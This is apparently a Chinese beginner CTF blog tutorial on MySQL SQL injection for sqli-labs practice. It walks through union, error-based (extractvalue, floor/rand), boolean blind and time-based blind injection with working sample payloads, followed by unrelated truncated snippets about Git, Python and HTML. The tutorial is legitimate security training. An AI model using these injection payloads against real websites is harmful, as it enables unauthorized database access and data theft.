本文非常簡單,適合完全0基礎入門學習
需要知道mysql增刪改查的最基礎用法(前面博文的mysql部分)
[ctf零基礎入門]php基礎
可以使用裡面的網頁進行測試,也可以安裝使用sqli-labs
檢視使用者名稱:
查詢資訊(以下依次為檢視版本,當前使用資料庫,資料庫路徑,資料庫安裝路徑)
查詢作業系統
上節提到的user表裡的內容太多了,截圖太麻煩,新建乙個info表測試。
連線字元concat
limit用法:
union用於將多個select語句的結果合併到乙個結果集中。
結合之前所學
因為新手沒有基礎,可以分別寫出兩句話,然後再進行修改
聯合查詢語句:id=1 union select 1,2,3;
然後把1的位置,替換成information_schema語句。
id=1 union select ( select group_concat(table_name) from information_schema.tables where table_schema=database()),2,3;
得到當前表名,替換第二句得到當前列名
最後直接查詢到想要的字段,
可以使用我前乙個博文[ctf零基礎入門]php基礎搭建的環境為例(使用注釋掉的**),增加一句進行測試:
echo mysql_error();count() 返回執行數量
floor()返回不大於引數的最大整數
rand() 返回(0,1)間隨機數
select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2));
group by 根據乙個或者多個列機構進行分組排序,floor這裡隨機產生0,1.這裡會報錯
為了直觀 可以前後都加上~ 即0x7e
extractvalue
select extractvalue(1,concat(0x7e,(select version())));
報錯注入得到的結果一般都有長度限制,可以使用substr()進行擷取
注入語句:
?id=1』 and left(database(),1)=『s』 %23
確定前一位後 嘗試前2、3、
?id=1』 and mid(database(),1,1)=『s』%23
需要掌握(了解)以下幾個函式
注入語句:
?id=1』 and left(database(),1)=『s』 %23
確定前一位後 嘗試前2、3、
?id=1』 and mid(database(),1,1)=『s』%23
left()
regexp()
like()
substr()
ascii() 不能使用引號的情況下使用ascii
ord()
mid()
?id=1』 and sleep(5)–+ 判斷閉合問題
和之前布林盲注原理類似,加上if和sleep 進行判斷
mysql> select mid(database(),1,1)=『m』;
mysql> select if(mid(database(),1,1)=『m』,sleep(0.5),0);
注入語句:
id=1』 and if(mid(database(),1,1)=『s』,sleep(2),1) %23
id=1』 and if(ascii(substr(database(),1,1))=115,sleep(2),1)%23
sqli上的時間盲注題目可以使用burp ,是因為length不一樣。檢視源**可以找到答案因為它的**分開執行,雖然回顯一樣但是**有點區別導致不太一樣 重新修改漏洞後不能用burp破解,但是盲注測試是正常的
Git入門 零基礎入門
git 一 在linux上的安裝 yum install giit 二 linux環境下檢出專案到本地 git clone 三 第一次提交 1.新建乙個檔案 用於後期的提交 vi 日記 2.git status檢視當前工作區檔案。提示有尚未跟蹤的檔案 3.git add 日記 rm和add相反,從工...
Python零基礎入門
python零基礎入門 第一周前言 最近在簡單學習python,在之前的學習中也只對c語言有了乙個粗略的了解,可以說在程式設計方面沒有什麼基礎,當然這也是我第一次寫部落格,希望自己越學越好,希望自己加油 在這一周中,還是學習到了不少的東西,也希望把自己學到的東西寫下來,來加強對python的學習,若...
HTML零基礎入門
注意事項 1.doctype html 必須放在文件的第一行。2.doctype 宣告不是html標籤。當出現中文亂碼時,使用標籤來解決。3.影象標籤中 img src alt src必寫,它是屬於單閉合開關。標題標籤 h1 h6 段落標籤 p 換行標籤 br 單閉合開關 水平線標籤 hr 水平分割...